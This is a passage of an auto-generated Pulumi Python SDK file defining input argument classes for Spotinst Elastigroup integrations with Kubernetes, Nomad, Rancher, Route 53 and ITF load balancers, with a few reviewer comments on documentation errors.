        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]] autoscale_labels: A list of key/value labels for the auto scaler.
        :param pulumi.Input[str] cluster_identifier: The identifier of the cluster to integrate with.
        :param pulumi.Input[str] integration_mode: Valid values: `"saas"`, `"pod"`.
        :param pulumi.Input[str] token: Kubernetes Token
        """
        # All fields are optional; each is forwarded only when explicitly provided.
        if api_server is not None:
            pulumi.set(__self__, "api_server", api_server)
        if autoscale_cooldown is not None:
            pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
        if autoscale_down is not None:
            pulumi.set(__self__, "autoscale_down", autoscale_down)
        if autoscale_headroom is not None:
            pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
        if autoscale_is_auto_config is not None:
            pulumi.set(__self__, "autoscale_is_auto_config", autoscale_is_auto_config)
        if autoscale_is_enabled is not None:
            pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
        if autoscale_labels is not None:
            pulumi.set(__self__, "autoscale_labels", autoscale_labels)
        if cluster_identifier is not None:
            pulumi.set(__self__, "cluster_identifier", cluster_identifier)
        if integration_mode is not None:
            pulumi.set(__self__, "integration_mode", integration_mode)
        if token is not None:
            pulumi.set(__self__, "token", token)
    @property
    @pulumi.getter(name="apiServer")
    def api_server(self) -> Optional[pulumi.Input[str]]:
        """
        The address of the Kubernetes API server.
        """
        return pulumi.get(self, "api_server")
    @api_server.setter
    def api_server(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "api_server", value)
    @property
    @pulumi.getter(name="autoscaleCooldown")
    def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
        """
        return pulumi.get(self, "autoscale_cooldown")
    @autoscale_cooldown.setter
    def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "autoscale_cooldown", value)
    @property
    @pulumi.getter(name="autoscaleDown")
    def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']]:
        """
        Settings for scale down actions.
        """
        return pulumi.get(self, "autoscale_down")
    @autoscale_down.setter
    def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']]):
        pulumi.set(self, "autoscale_down", value)
    @property
    @pulumi.getter(name="autoscaleHeadroom")
    def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']]:
        """
        An option to set compute reserve for the cluster.
        """
        return pulumi.get(self, "autoscale_headroom")
    @autoscale_headroom.setter
    def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']]):
        pulumi.set(self, "autoscale_headroom", value)
    @property
    @pulumi.getter(name="autoscaleIsAutoConfig")
    def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
        """
        Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
        """
        return pulumi.get(self, "autoscale_is_auto_config")
    @autoscale_is_auto_config.setter
    def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_auto_config", value)
    @property
    @pulumi.getter(name="autoscaleIsEnabled")
    def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the auto scaling feature is enabled.
        """
        return pulumi.get(self, "autoscale_is_enabled")
    @autoscale_is_enabled.setter
    def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_enabled", value)
    @property
    @pulumi.getter(name="autoscaleLabels")
    def autoscale_labels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]]:
        """
        A list of key/value labels for the auto scaler.
        """
        return pulumi.get(self, "autoscale_labels")
    @autoscale_labels.setter
    def autoscale_labels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]]):
        pulumi.set(self, "autoscale_labels", value)
    @property
    @pulumi.getter(name="clusterIdentifier")
    def cluster_identifier(self) -> Optional[pulumi.Input[str]]:
        """
        The identifier of the cluster to integrate with.
        """
        return pulumi.get(self, "cluster_identifier")
    @cluster_identifier.setter
    def cluster_identifier(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "cluster_identifier", value)
    @property
    @pulumi.getter(name="integrationMode")
    def integration_mode(self) -> Optional[pulumi.Input[str]]:
        """
        Valid values: `"saas"`, `"pod"`.
        """
        return pulumi.get(self, "integration_mode")
    @integration_mode.setter
    def integration_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "integration_mode", value)
    @property
    @pulumi.getter
    def token(self) -> Optional[pulumi.Input[str]]:
        """
        Kubernetes Token
        """
        return pulumi.get(self, "token")
    @token.setter
    def token(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleDownArgs:
    """Scale-down settings for the Kubernetes autoscaler integration."""
    def __init__(__self__, *,
                 evaluation_periods: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
        """
        # evaluation_periods is optional and is forwarded only when explicitly provided.
        if evaluation_periods is not None:
            pulumi.set(__self__, "evaluation_periods", evaluation_periods)
    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        How many evaluation periods should accumulate before a scale down action takes place.
        """
        return pulumi.get(self, "evaluation_periods")
    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs:
    """Compute headroom (spare capacity reserve) for the Kubernetes autoscaler."""
    def __init__(__self__, *,
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None,
                 num_of_units: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
        :param pulumi.Input[int] memory_per_unit: How much memory to allocate for headroom unit.
        :param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
        """
        # Optional fields are forwarded only when explicitly provided.
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)
        if num_of_units is not None:
            pulumi.set(__self__, "num_of_units", num_of_units)
    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much CPU (MHz) to allocate for headroom unit.
        """
        return pulumi.get(self, "cpu_per_unit")
    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)
    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much memory to allocate for headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")
    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)
    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> Optional[pulumi.Input[int]]:
        """
        How many units of headroom to allocate.
        """
        return pulumi.get(self, "num_of_units")
    @num_of_units.setter
    def num_of_units(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleLabelArgs:
    """A single key/value label used by the Kubernetes autoscaler."""
    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The label key.
        :param pulumi.Input[str] value: The label value.
               NOTE(review): upstream doc said "The dimension value" — likely a copy/paste
               from a CloudWatch-dimension type; this class models an autoscale label.
        """
        # Both fields are required.
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The label key.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The label value.
        """
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationMesosphereArgs:
    """Configuration for the Mesosphere (DC/OS) integration of an Elastigroup."""
    def __init__(__self__, *,
                 api_server: pulumi.Input[str]):
        """
        :param pulumi.Input[str] api_server: The public IP of the DC/OS Master.
        """
        # api_server is required.
        pulumi.set(__self__, "api_server", api_server)
    @property
    @pulumi.getter(name="apiServer")
    def api_server(self) -> pulumi.Input[str]:
        """
        The public IP of the DC/OS Master.
        """
        return pulumi.get(self, "api_server")
    @api_server.setter
    def api_server(self, value: pulumi.Input[str]):
        pulumi.set(self, "api_server", value)
@pulumi.input_type
class ElastigroupIntegrationMultaiRuntimeArgs:
    """Configuration for the Multai runtime integration of an Elastigroup."""
    def __init__(__self__, *,
                 deployment_id: pulumi.Input[str]):
        """
        :param pulumi.Input[str] deployment_id: The deployment id you want to get
        """
        # deployment_id is required.
        pulumi.set(__self__, "deployment_id", deployment_id)
    @property
    @pulumi.getter(name="deploymentId")
    def deployment_id(self) -> pulumi.Input[str]:
        """
        The deployment id you want to get
        """
        return pulumi.get(self, "deployment_id")
    @deployment_id.setter
    def deployment_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "deployment_id", value)
@pulumi.input_type
class ElastigroupIntegrationNomadArgs:
def __init__(__self__, *,
master_host: pulumi.Input[str],
master_port: pulumi.Input[int],
acl_token: Optional[pulumi.Input[str]] = None,
autoscale_constraints: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]] = None,
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] master_host: The URL for the Nomad master host.
:param pulumi.Input[int] master_port: The network port for the master host.
:param pulumi.Input[str] acl_token: Nomad ACL Token
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]] autoscale_constraints: A key/value mapping of tags to assign to the resource.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
"""
pulumi.set(__self__, "master_host", master_host)
pulumi.set(__self__, "master_port", master_port)
if acl_token is not None:
pulumi.set(__self__, "acl_token", acl_token)
if autoscale_constraints is not None:
pulumi.set(__self__, "autoscale_constraints", autoscale_constraints)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
@property
@pulumi.getter(name="masterHost")
def master_host(self) -> pulumi.Input[str]:
"""
The URL for the Nomad master host.
"""
return pulumi.get(self, "master_host")
@master_host.setter
def master_host(self, value: pulumi.Input[str]):
pulumi.set(self, "master_host", value)
@property
@pulumi.getter(name="masterPort")
def master_port(self) -> pulumi.Input[int]:
"""
The network port for the master host.
"""
return pulumi.get(self, "master_port")
@master_port.setter
def master_port(self, value: pulumi.Input[int]):
pulumi.set(self, "master_port", value)
@property
@pulumi.getter(name="aclToken")
def acl_token(self) -> Optional[pulumi.Input[str]]:
"""
Nomad ACL Token
"""
return pulumi.get(self, "acl_token")
@acl_token.setter
def acl_token(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl_token", value)
@property
@pulumi.getter(name="autoscaleConstraints")
def autoscale_constraints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]]:
"""
A key/value mapping of tags to assign to the resource.
"""
return pulumi.get(self, "autoscale_constraints")
@autoscale_constraints.setter
def autoscale_constraints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]]):
pulumi.set(self, "autoscale_constraints", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
    @property
    @pulumi.getter(name="autoscaleHeadroom")
    def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']]:
        """
        An option to set compute reserve for the cluster.
        """
        return pulumi.get(self, "autoscale_headroom")

    @autoscale_headroom.setter
    def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']]):
        # Stores the new value under the "autoscale_headroom" input key.
        pulumi.set(self, "autoscale_headroom", value)
    @property
    @pulumi.getter(name="autoscaleIsEnabled")
    def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the auto scaling feature is enabled.
        """
        return pulumi.get(self, "autoscale_is_enabled")

    @autoscale_is_enabled.setter
    def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
        # Stores the new value under the "autoscale_is_enabled" input key.
        pulumi.set(self, "autoscale_is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleConstraintArgs:
    """A single key/value constraint consumed by the Nomad autoscaler integration."""

    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The constraint key.
        :param pulumi.Input[str] value: The dimension value.
        """
        # Both fields are required, so record them unconditionally.
        for attr_name, attr_value in (("key", key), ("value", value)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """The constraint key."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """The dimension value."""
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleDownArgs:
    """Scale-down behaviour for the Nomad autoscaler integration."""

    def __init__(__self__, *,
                 evaluation_periods: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
        """
        if evaluation_periods is None:
            # An omitted optional field is simply not recorded.
            return
        pulumi.set(__self__, "evaluation_periods", evaluation_periods)

    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """How many evaluation periods should accumulate before a scale down action takes place."""
        return pulumi.get(self, "evaluation_periods")

    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleHeadroomArgs:
    """Compute headroom (reserve capacity) settings for the Nomad autoscaler."""

    def __init__(__self__, *,
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None,
                 num_of_units: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
        :param pulumi.Input[int] memory_per_unit: How much Memory allocate for headroom unit.
        :param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
        """
        # Only record fields the caller actually supplied.
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)
        if num_of_units is not None:
            pulumi.set(__self__, "num_of_units", num_of_units)

    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much CPU (MHz) to allocate for headroom unit.
        """
        return pulumi.get(self, "cpu_per_unit")

    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)

    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much Memory allocate for headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")

    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)

    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> Optional[pulumi.Input[int]]:
        """
        How many units of headroom to allocate.
        """
        return pulumi.get(self, "num_of_units")

    @num_of_units.setter
    def num_of_units(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationRancherArgs:
    """Inputs for the Rancher integration of an Elastigroup."""

    def __init__(__self__, *,
                 access_key: pulumi.Input[str],
                 master_host: pulumi.Input[str],
                 secret_key: pulumi.Input[str],
                 version: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] access_key: The access key of the Rancher API.
        :param pulumi.Input[str] master_host: The URL of the Rancher master host.
            (The generated doc previously said "Nomad master host" — a copy-paste
            error; this class configures the Rancher integration.)
        :param pulumi.Input[str] secret_key: The secret key of the Rancher API.
        :param pulumi.Input[str] version: The Rancher version. Must be `"1"` or `"2"`. If this field is omitted, it's assumed that the Rancher cluster is version 1. Note that Kubernetes is required when using Rancher version 2.
        """
        pulumi.set(__self__, "access_key", access_key)
        pulumi.set(__self__, "master_host", master_host)
        pulumi.set(__self__, "secret_key", secret_key)
        if version is not None:
            pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter(name="accessKey")
    def access_key(self) -> pulumi.Input[str]:
        """
        The access key of the Rancher API.
        """
        return pulumi.get(self, "access_key")

    @access_key.setter
    def access_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "access_key", value)

    @property
    @pulumi.getter(name="masterHost")
    def master_host(self) -> pulumi.Input[str]:
        """
        The URL of the Rancher master host.
        """
        return pulumi.get(self, "master_host")

    @master_host.setter
    def master_host(self, value: pulumi.Input[str]):
        pulumi.set(self, "master_host", value)

    @property
    @pulumi.getter(name="secretKey")
    def secret_key(self) -> pulumi.Input[str]:
        """
        The secret key of the Rancher API.
        """
        return pulumi.get(self, "secret_key")

    @secret_key.setter
    def secret_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "secret_key", value)

    @property
    @pulumi.getter
    def version(self) -> Optional[pulumi.Input[str]]:
        """
        The Rancher version. Must be `"1"` or `"2"`. If this field is omitted, it's assumed that the Rancher cluster is version 1. Note that Kubernetes is required when using Rancher version 2.
        """
        return pulumi.get(self, "version")

    @version.setter
    def version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53Args:
    """Route 53 integration settings: the set of domains to register."""

    def __init__(__self__, *,
                 domains: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]):
        """
        :param domains: Collection of one or more domains to register.
        """
        # `domains` is the only (required) field of this input type.
        pulumi.set(__self__, "domains", domains)

    @property
    @pulumi.getter
    def domains(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]:
        """Collection of one or more domains to register."""
        return pulumi.get(self, "domains")

    @domains.setter
    def domains(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]):
        pulumi.set(self, "domains", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53DomainArgs:
    """A single Route 53 domain registration: hosted zone, record sets, and options."""

    def __init__(__self__, *,
                 hosted_zone_id: pulumi.Input[str],
                 record_sets: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]],
                 record_set_type: Optional[pulumi.Input[str]] = None,
                 spotinst_acct_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] hosted_zone_id: The id associated with a hosted zone.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]] record_sets: Collection of records containing authoritative DNS information for the specified domain name.
        :param pulumi.Input[str] record_set_type: The type of the record set. Valid values: `"a"`, `"cname"`.
        :param pulumi.Input[str] spotinst_acct_id: The Spotinst account ID that is linked to the AWS account that holds the Route 53 Hosted Zone ID. The default is the user Spotinst account provided as a URL parameter.
        """
        pulumi.set(__self__, "hosted_zone_id", hosted_zone_id)
        pulumi.set(__self__, "record_sets", record_sets)
        # Optional fields are only recorded when supplied.
        if record_set_type is not None:
            pulumi.set(__self__, "record_set_type", record_set_type)
        if spotinst_acct_id is not None:
            pulumi.set(__self__, "spotinst_acct_id", spotinst_acct_id)

    @property
    @pulumi.getter(name="hostedZoneId")
    def hosted_zone_id(self) -> pulumi.Input[str]:
        """
        The id associated with a hosted zone.
        """
        return pulumi.get(self, "hosted_zone_id")

    @hosted_zone_id.setter
    def hosted_zone_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "hosted_zone_id", value)

    @property
    @pulumi.getter(name="recordSets")
    def record_sets(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]]:
        """
        Collection of records containing authoritative DNS information for the specified domain name.
        """
        return pulumi.get(self, "record_sets")

    @record_sets.setter
    def record_sets(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]]):
        pulumi.set(self, "record_sets", value)

    @property
    @pulumi.getter(name="recordSetType")
    def record_set_type(self) -> Optional[pulumi.Input[str]]:
        """
        The type of the record set. Valid values: `"a"`, `"cname"`.
        """
        return pulumi.get(self, "record_set_type")

    @record_set_type.setter
    def record_set_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "record_set_type", value)

    @property
    @pulumi.getter(name="spotinstAcctId")
    def spotinst_acct_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Spotinst account ID that is linked to the AWS account that holds the Route 53 Hosted Zone ID. The default is the user Spotinst account provided as a URL parameter.
        """
        return pulumi.get(self, "spotinst_acct_id")

    @spotinst_acct_id.setter
    def spotinst_acct_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "spotinst_acct_id", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53DomainRecordSetArgs:
    """A single DNS record set registered under a Route 53 domain."""

    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 use_public_dns: Optional[pulumi.Input[bool]] = None,
                 use_public_ip: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] name: The record set name.
        :param pulumi.Input[bool] use_public_dns: Designates whether the DNS address should be exposed to connections outside the VPC.
        :param pulumi.Input[bool] use_public_ip: Designates whether the IP address should be exposed to connections outside the VPC.
        """
        pulumi.set(__self__, "name", name)
        if use_public_dns is not None:
            pulumi.set(__self__, "use_public_dns", use_public_dns)
        if use_public_ip is not None:
            pulumi.set(__self__, "use_public_ip", use_public_ip)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        The record set name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="usePublicDns")
    def use_public_dns(self) -> Optional[pulumi.Input[bool]]:
        """
        Designates whether the DNS address should be exposed to connections outside the VPC.
        """
        return pulumi.get(self, "use_public_dns")

    @use_public_dns.setter
    def use_public_dns(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_public_dns", value)

    @property
    @pulumi.getter(name="usePublicIp")
    def use_public_ip(self) -> Optional[pulumi.Input[bool]]:
        """
        Designates whether the IP address should be exposed to connections outside the VPC.
        """
        return pulumi.get(self, "use_public_ip")

    @use_public_ip.setter
    def use_public_ip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "use_public_ip", value)
@pulumi.input_type
class ElastigroupItfArgs:
    """Instance Traffic Flow (ITF) configuration: load balancers, target group
    configs, and the weighting strategy applied between target groups.
    NOTE(review): upstream schema ships no field docs for this type; the
    descriptions below are inferred from field names — confirm against the
    Spot API reference."""

    def __init__(__self__, *,
                 fixed_target_groups: pulumi.Input[bool],
                 load_balancers: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]],
                 target_group_configs: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]],
                 weight_strategy: pulumi.Input[str],
                 migration_healthiness_threshold: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[bool] fixed_target_groups: Whether the set of target groups is fixed (presumed from name — TODO confirm).
        :param load_balancers: Load balancers managed by the ITF integration.
        :param target_group_configs: Configurations for the target groups created by ITF.
        :param pulumi.Input[str] weight_strategy: Strategy used to weight traffic between target groups (valid values not visible here).
        :param pulumi.Input[int] migration_healthiness_threshold: Healthiness threshold applied during migration (presumed from name — TODO confirm).
        """
        pulumi.set(__self__, "fixed_target_groups", fixed_target_groups)
        pulumi.set(__self__, "load_balancers", load_balancers)
        pulumi.set(__self__, "target_group_configs", target_group_configs)
        pulumi.set(__self__, "weight_strategy", weight_strategy)
        if migration_healthiness_threshold is not None:
            pulumi.set(__self__, "migration_healthiness_threshold", migration_healthiness_threshold)

    @property
    @pulumi.getter(name="fixedTargetGroups")
    def fixed_target_groups(self) -> pulumi.Input[bool]:
        return pulumi.get(self, "fixed_target_groups")

    @fixed_target_groups.setter
    def fixed_target_groups(self, value: pulumi.Input[bool]):
        pulumi.set(self, "fixed_target_groups", value)

    @property
    @pulumi.getter(name="loadBalancers")
    def load_balancers(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]]:
        return pulumi.get(self, "load_balancers")

    @load_balancers.setter
    def load_balancers(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]]):
        pulumi.set(self, "load_balancers", value)

    @property
    @pulumi.getter(name="targetGroupConfigs")
    def target_group_configs(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]]:
        return pulumi.get(self, "target_group_configs")

    @target_group_configs.setter
    def target_group_configs(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]]):
        pulumi.set(self, "target_group_configs", value)

    @property
    @pulumi.getter(name="weightStrategy")
    def weight_strategy(self) -> pulumi.Input[str]:
        return pulumi.get(self, "weight_strategy")

    @weight_strategy.setter
    def weight_strategy(self, value: pulumi.Input[str]):
        pulumi.set(self, "weight_strategy", value)

    @property
    @pulumi.getter(name="migrationHealthinessThreshold")
    def migration_healthiness_threshold(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "migration_healthiness_threshold")

    @migration_healthiness_threshold.setter
    def migration_healthiness_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "migration_healthiness_threshold", value)
@pulumi.input_type
class ElastigroupItfLoadBalancerArgs:
    """An ITF-managed load balancer: its ARN plus the listener rules attached to it."""

    def __init__(__self__, *,
                 listener_rules: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]],
                 load_balancer_arn: pulumi.Input[str]):
        """
        :param listener_rules: Listener rules managed on this load balancer.
        :param load_balancer_arn: ARN of the load balancer.
        """
        # Both fields are required; record them unconditionally.
        for attr_name, attr_value in (("listener_rules", listener_rules),
                                      ("load_balancer_arn", load_balancer_arn)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="listenerRules")
    def listener_rules(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]]:
        """Listener rules managed on this load balancer."""
        return pulumi.get(self, "listener_rules")

    @listener_rules.setter
    def listener_rules(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]]):
        pulumi.set(self, "listener_rules", value)

    @property
    @pulumi.getter(name="loadBalancerArn")
    def load_balancer_arn(self) -> pulumi.Input[str]:
        """ARN of the load balancer."""
        return pulumi.get(self, "load_balancer_arn")

